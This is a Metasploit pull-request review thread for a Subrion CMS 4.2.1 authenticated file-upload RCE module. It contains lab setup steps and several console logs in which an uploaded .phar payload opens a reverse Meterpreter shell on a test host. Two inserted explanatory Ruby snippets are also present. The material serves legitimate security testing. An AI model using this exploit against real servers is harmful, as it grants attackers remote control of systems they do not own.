Add module and documentation for Subrion CMS v4.2.1 RCE #18211
Conversation
Thanks for this module @ismaildawoodjee ! This looks great. I just left a few comments and suggestions for you to review when you get a chance. I'll start testing once it is done.
documentation/modules/exploit/linux/http/subrion_cms_file_upload_rce.md (outdated)

> LAMP is a recommended stack, so this module was tested on a Debian 10 VM along with the applications listed above. Installing Subrion can be somewhat tedious, and quite a few things can go wrong, so a quick and easy way would be to run the following script on a fresh image of Debian 10 with `sudo` user permissions. To be able to actually copy and paste the script, `open-vm-tools` and `open-vm-tools-desktop` need to be installed via `apt` if using VMware Workstation Player. Website links are also provided as reference to see what the commands are doing.
>
> Subrion CMS v4.2.1 can be installed much more easily on XAMPP in Windows. However, I failed to achieve remote code execution in this configuration, neither with a basic webshell nor with the `PhpEXE` mixin payload.
Did you get any error? Or maybe anything interesting in the server logs? We can help to debug this and make it work on Windows too.
I downloaded and installed XAMPP 7.4.3 from here, and installed PHP 7.4.3 on Windows 10 and added it to PATH. Expanded the Subrion 4.2.1 zip file in `C:\xampp\htdocs\` and set it up easily.

After that I got quite a few warnings and deprecation notices, probably because it was PHP 7.4 and curly brace syntax was deprecated, but it probably wouldn't affect PHP file execution.

My initial hunch was that the PHP extension to execute `.phar` files was not installed on the Windows 10 host, but according to https://stackoverflow.com/questions/66868454/install-it-or-recompile-php-without-disable-phar-on-windows, phar extensions are enabled by default and I also found `phar` when running `php -m`.
PS C:\WINDOWS\system32> php -v
PHP 7.4.3 (cli) (built: Feb 18 2020 17:29:46) ( ZTS Visual C++ 2017 x64 )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
PS C:\WINDOWS\system32> php -m
[PHP Modules]
bcmath
bz2
calendar
Core
ctype
curl
date
dom
exif
fileinfo
filter
ftp
gd
gettext
hash
iconv
json
libxml
mbstring
mysqli
mysqlnd
openssl
pcre
PDO
pdo_mysql
pdo_sqlite
Phar <<------<
readline
Reflection
session
SimpleXML
SPL
standard
tokenizer
xml
xmlreader
xmlwriter
zip
zlib
[Zend Modules]
Also disabled the `phar.readonly` and `phar.require_hash` settings in the `php.ini` file. Restarted Apache and retested, but no luck:

I get this error when looking at the source code of the web page:

The Apache `error.log` is ok, but to get the `php_error_log`, you need to create a folder: https://stackoverflow.com/questions/43247952/php-error-log-missing-in-xampp

But there's nothing of note in the Apache `access.log` or `error.log` or `php_error_log.txt`.
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…jee/metasploit-framework into subrion_cms_file_upload_rce
```ruby
print_status('Checking Subrion CMS version...')
version = res.body.match('Powered by <a href=.*')
version_number = version.to_s.split.last.scan(/\d+/).join('.') if version
```
Is there are more straight forward way to parse out the version here?
I could parse it in a way similar to how I obtained the CSRF token.
Implemented changes on Lines 95-97
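As an added example (not the module's code from this PR, and not necessarily how the final module parses it), here is one way to pull the version out of the "Powered by" footer with a single anchored regex instead of the split/scan chain in the snippet above, followed by a comparison against the last affected release the PR names. The footer HTML is a constructed sample: the real Subrion footer markup is assumed to carry the version digits on the same line as the `Powered by <a href=` anchor, which is also what the original match relies on.

```ruby
# Added example, not the module's own code: parse the Subrion CMS version out of
# the "Powered by" footer with one anchored regex, then compare it as a real
# version instead of a string. The HTML below is a constructed sample; the real
# footer markup is assumed to carry the version digits on the same line as the
# "Powered by <a href=" anchor, which is what the module's own match relies on.
require 'rubygems'

SAMPLE_FOOTER = <<~HTML
  <div class="footer">
    Powered by <a href="https://subrion.org/">Subrion CMS</a> v4.2.1
  </div>
HTML

# Version digits following the "Powered by <a href=" anchor on the same line.
VERSION_RE = /Powered by <a href=[^\n]*?\bv?(?<version>\d+(?:\.\d+){1,3})/i

# Returns the version string ("4.2.1") or nil when no footer is present.
def subrion_version(body)
  m = body.match(VERSION_RE)
  m && m[:version]
end

# Last release the PR describes as affected ("versions 4.2.1 and prior").
LAST_AFFECTED = Gem::Version.new('4.2.1')

# Gem::Version compares component-wise, so 4.10.0 is correctly newer than 4.2.1,
# which a plain string comparison would get wrong.
def version_affected?(version)
  return false if version.nil?

  Gem::Version.new(version) <= LAST_AFFECTED
rescue ArgumentError # malformed version string
  false
end

if __FILE__ == $PROGRAM_NAME
  v = subrion_version(SAMPLE_FOOTER)
  puts "detected version: #{v.inspect}, affected: #{version_affected?(v)}"
end
```

The named capture makes the intent visible to the next reviewer, and `Gem::Version` avoids the classic mistake of comparing "4.10.0" and "4.2.1" lexically.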
Thanks for updating this @ismaildawoodjee. I just left a few more comments. I successfully tested using a Docker image and a Windows installation (see my comments below).
> achieve remote code execution. In this module, a `.phar` file with a randomized name is uploaded and executed to receive a Meterpreter session on the target, then deletes itself afterwards.
>
> ### Setup
I managed to run version 4.1.0 using docker. I used a modified `docker-compose.yml` from the official repository:

```yaml
version: '3'
services:
  subrion:
    image: intelliants/subrion
    container_name: subrion
    links:
      - subriondb:mysql
    ports:
      - 8080:80
    environment:
      SUBRION_DB_PASSWORD: secretpass
  subriondb:
    image: mysql:5.6
    container_name: subriondb
    environment:
      MYSQL_ROOT_PASSWORD: secretpass
```

Then run `docker-compose up`.

The config embedded in this docker image does not include the `.phar` file type to be parsed through the PHP handler. I needed to update the `/etc/apache2/conf-enabled/docker-php.conf` configuration file in the container and reload Apache:

```
❯ docker exec -ti subrion bash
root@f9e6aa4a9e5b:/var/www/html# sed -i'' 's/<FilesMatch .*/<FilesMatch \\.(php|phar)$>/' /etc/apache2/conf-enabled/docker-php.conf
root@f9e6aa4a9e5b:/var/www/html# /etc/init.d/apache2 reload
[ ok ] Reloading web server: apache2.
```

Then just finish the installation at http://127.0.0.1:8080/ with the following values:

```
DB Hostname: subriondb
DB Username: root
DB Password: secretpass
DB Name: subrion
DB Port: 3306 (default)
Table Prefix: sbr421_ (default)

Administrator Configuration:
Username: admin
Password: 123456
Confirm: 123456
Email: anyemail@mail.com
```
Please, would you mind adding this installation alternative to the documentation?
Thanks for the additional testing. I'll try it out myself soon and add the results to the documentation.
> Subrion CMS v4.2.1 can be installed much more easily on XAMPP in Windows. However, I failed to achieve remote code execution in this configuration, neither with a basic webshell nor with the `PhpEXE` mixin payload.
I managed to make it work on Windows. Same as the docker builds, the XAMPP's Apache configuration does not include the `.phar` file type to be parsed through the PHP handler. This is what I've done:

- Install XAMPP 7.4.3
- Modify `C:\xampp\apache\conf\extra\httpd-xampp.conf`. Change this line: `<FilesMatch "\.php$">` to this: `<FilesMatch "\.(php|phar)$">`
- Restart Apache
This is the Metasploit console output:
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > run rhosts=192.168.100.103 lhost=192.168.100.1 username=admin password=123456 verbose=true targeturi=subrion/
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.100.103/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: JV9hc6PcMf0fO9VF9uqEMkiWQvNBiredsOQuqYtb
[*] Logging in to Subrion Admin Panel at: http://192.168.100.103/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.100.103/subrion/uploads/ftxweolrol.phar
[*] Executing 'ftxweolrol.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.100.103
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.103:50048) at 2023-07-27 18:20:46 +0200
[+] Successfully executed payload: http://192.168.100.103/subrion/uploads/ftxweolrol.phar
meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer : WIN2019
OS : Windows NT WIN2019 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows
Please, can you update the documentation with these Windows installation steps?
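The root cause in both the Docker and the XAMPP findings above is the same: the stock `FilesMatch` directive hands only `\.php$` to the PHP handler, so an uploaded `.phar` is served as a static file instead of being executed. As an added example that is not part of this PR or of Metasploit, the Ruby script below parses Apache `FilesMatch`/`SetHandler` blocks out of a configuration and reports which candidate filenames in an uploads directory would be run by the PHP engine, so an administrator can verify that a hardened configuration does not route extra extensions to it. Both configuration texts are constructed samples modelled on the `docker-php.conf` and `httpd-xampp.conf` lines quoted in the thread; the script does not cover `AddHandler`/`AddType` or `.htaccess` overrides, which would need the same treatment.

```ruby
# Added example, not part of the PR or Metasploit: audit which filenames an Apache
# configuration routes to the PHP engine through <FilesMatch> + SetHandler.
# Both configurations below are constructed samples modelled on the
# docker-php.conf / httpd-xampp.conf lines discussed in the review thread.

# Stock configuration: only *.php reaches the PHP handler.
STOCK_CONF = <<~'CONF'
  <FilesMatch \.php$>
      SetHandler application/x-httpd-php
  </FilesMatch>
CONF

# Modified configuration from the thread: *.phar is executed too.
PATCHED_CONF = <<~'CONF'
  <FilesMatch "\.(php|phar)$">
      SetHandler application/x-httpd-php
  </FilesMatch>
  <FilesMatch "\.phps$">
      SetHandler application/x-httpd-php-source
  </FilesMatch>
CONF

PHP_HANDLER = 'application/x-httpd-php'.freeze

# Filenames an uploads directory might contain (constructed probe names).
PROBE_FILENAMES = %w[upload.php upload.phar upload.phtml upload.php5 upload.phps upload.txt].freeze

# Extracts [filesmatch_regex, handler] pairs. Only SetHandler lines that sit
# inside a <FilesMatch> block are collected; the pattern may be quoted or bare.
def filesmatch_rules(conf)
  rules = []
  pattern = nil
  conf.each_line do |raw|
    line = raw.strip
    if (m = line.match(%r{\A<FilesMatch\s+"?([^"\s>]+)"?\s*>\z}i))
      pattern = m[1]
    elsif line.match?(%r{\A</FilesMatch>\z}i)
      pattern = nil
    elsif pattern && (m = line.match(/\ASetHandler\s+(\S+)/i))
      rules << [pattern, m[1]]
    end
  end
  rules
end

# Returns { filename => true/false } telling whether Apache would execute the
# file as PHP. FilesMatch patterns are regular expressions, so they are compiled
# as-is (Apache regexes are case-sensitive unless the pattern says otherwise).
def executed_as_php(conf, filenames = PROBE_FILENAMES)
  php_patterns = filesmatch_rules(conf)
                 .select { |_, handler| handler == PHP_HANDLER }
                 .map { |pattern, _| Regexp.new(pattern) }
  filenames.to_h { |name| [name, php_patterns.any? { |re| re.match?(name) }] }
end

# Filenames that would run as PHP without carrying the plain .php extension:
# these are the ones a hardening review should question.
def unexpected_php_executables(conf, filenames = PROBE_FILENAMES)
  executed_as_php(conf, filenames).select { |name, run| run && !name.end_with?('.php') }.keys
end

if __FILE__ == $PROGRAM_NAME
  puts "stock:   #{unexpected_php_executables(STOCK_CONF).inspect}"
  puts "patched: #{unexpected_php_executables(PATCHED_CONF).inspect}"
end
```

Run against a real `httpd-xampp.conf` or `docker-php.conf` by reading the file into a string; the stock sample yields no unexpected executables, while the patched sample flags `upload.phar`, which is exactly the difference that made the module succeed in the tests above.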
That's great to know. So it was a XAMPP specific problem/configuration? I also tried an alternative installation using WAMP.NET and failed to get RCE. I'll look at it soon and add to the docs, a bit occupied at the moment.
Added the installation instructions for both Docker and XAMPP. If you don't mind, may I know how you found out about the configuration file not allowing execution of `.phar` files? I searched and searched but could not find the solution 😕
Thank you for updating the documentation. I accessed the `.phar` file directly with a browser after it had been uploaded by the module and noticed the `php` code was not interpreted by the server. I've seen this before and immediately thought about a configuration issue. I had to look into all the configuration files to locate the correct `FilesMatch` and modify it.
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Thanks for updating this. Since it is a generic
Sure, I'll do that. However, I noticed an issue with the

The following exploits were against a XAMPP configuration on Windows 10, set up according to the instructions in the README. The Meterpreter session opens, but shell commands cannot be run:

msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.29.1/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 4ZYPtRV9oZEboIGk2LPXJEorkgwUnW3NoaNxw8HE
[*] Logging in to Subrion Admin Panel at: http://192.168.29.1/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.29.1/uploads/hnhzicvsca.phar
[*] Executing 'hnhzicvsca.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:63453) at 2023-08-01 07:29:20 -0400
[+] Successfully executed payload: http://192.168.29.1/uploads/hnhzicvsca.phar
meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows NT DESKTOP-50BU5J8 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > shell
Process 14308 created.
Channel 0 created.
Microsoft Windows [Version 10.0.19045.3208]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads>whoami <<---------<< Here, the shell becomes unresponsive and the following prompt appears
Terminate channel 0? [y/N] y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter >
[*] 192.168.29.1 - Meterpreter session 1 closed. Reason: Died

The Meterpreter session dies after I try to get another shell:

msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.29.1/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 2252t69N1EcpnkeSx8J6qVcMtYfbgiskdBgOSRYE
[*] Logging in to Subrion Admin Panel at: http://192.168.29.1/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.29.1/uploads/ymsmovwlju.phar
[*] Executing 'ymsmovwlju.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.1
[*] Meterpreter session 3 opened (192.168.245.128:4444 -> 192.168.245.1:63495) at 2023-08-01 07:35:15 -0400
[+] Successfully executed payload: http://192.168.29.1/uploads/ymsmovwlju.phar
meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows NT DESKTOP-50BU5J8 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > shell
Process 1508 created.
Channel 0 created.
Microsoft Windows [Version 10.0.19045.3208]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads>dir
Terminate channel 0? [y/N] N
Terminate channel 0? [y/N] N
Terminate channel 0? [y/N] y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell
[*] 192.168.29.1 - Meterpreter session 3 closed. Reason: Died
[-] Error running command shell: Rex::TimeoutError Send timed out
msf6 exploit(linux/http/subrion_cms_file_upload_rce) >

Could you confirm that this also happens on your end? Perhaps I can raise an issue if it's not specific to my machine.
Thanks for reporting this. I confirmed the issue is not related to your module. I tried with both PHP version 7.4.3 and 8.9.0 and got the same issue. On Metasploit console:
On the target:
@cdelafuente-r7 I believe this module should be good to go unless there's something else you'd like me to do. Feel free to review and do additional testing (maybe with proxies, etc.), or merge it whenever it's convenient. Thanks for the reviews and troubleshooting with the XAMPP and Docker installations 💯
Thanks @ismaildawoodjee ! It looks good to me now. I retested everything and it works as expected. I'll go ahead and land it.

Example output

Subrion CMS Version 4.1.0 on Docker

Subrion CMS Version 4.2.0 on Windows
Thank you @ismaildawoodjee for your contribution!
Release Notes

This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due to an issue in the way the
Complex Software Examples:
Setup
According to the official installation page, the setup for Subrion CMS v4.2.1 requires at least:

LAMP is a recommended stack, so this module was tested on a Debian 10 VM along with the applications listed above. Installing Subrion can be somewhat tedious, and quite a few things can go wrong, so a quick and easy way would be to run the following script on a fresh image of Debian 10 with `sudo` user permissions. To be able to actually copy and paste the script, `open-vm-tools` and `open-vm-tools-desktop` need to be installed via `apt` if using VMware Workstation Player. Website links are also provided as reference to see what the commands are doing.

Subrion CMS v4.2.1 can be installed much more easily on XAMPP in Windows. However, I failed to achieve remote code execution when using XAMPP in Windows, neither with a basic webshell nor with the `PhpEXE` mixin payload.

Installation script on a fresh Debian 10 VM:

This will set up Subrion CMS 4.2.1 as a virtual host website on http://subrion-vuln.com using the LAMP stack:

LAMP on Debian 10:

[screenshot: lamp]

Once this is done, and after the web browser opens up the Subrion CMS installation page at http://subrion-vuln.com/install, fill in the following fields in the `Configuration` page after passing the `Pre-Installation Check` and accepting the `Subrion License`:

[screenshot: subrion_config]

Once the configuration is done, navigate to http://subrion-vuln.com/panel/ and login as an Administrator to confirm successful setup.

[screenshot: success]

Verification Steps

1. Set up Subrion CMS v4.2.1 as described above and confirm the admin panel is reachable at http://subrion-vuln.com/panel/.
2. Start `msfconsole` and follow along with default options
3. `use exploit/linux/http/subrion_cms_file_upload_rce`
4. `set RHOSTS [SUBRION_SERVER_IP]`
5. `set LHOST eth0`
6. `exploit`
Options

RPORT (Required)

This is the default HTTP port 80 for the Subrion CMS website.

TARGETURI (Required)

This is the base path of the Subrion CMS website. It can be changed in case the files are not installed as a VHost, for example, in `/var/www/html/subrion/*` and not in `/var/www/subrion/*`.

USERNAME (Required)

This is the username for the Subrion CMS admin panel page, required for exploitation.

PASSWORD (Required)

This is the password for the Subrion CMS admin panel page, also required for exploitation.
Scenarios
Subrion CMS v4.2.1 on Debian 10
Subrion CMS v4.2.1 on Ubuntu 20.04 (Exfiltrated from Proving Grounds Practice)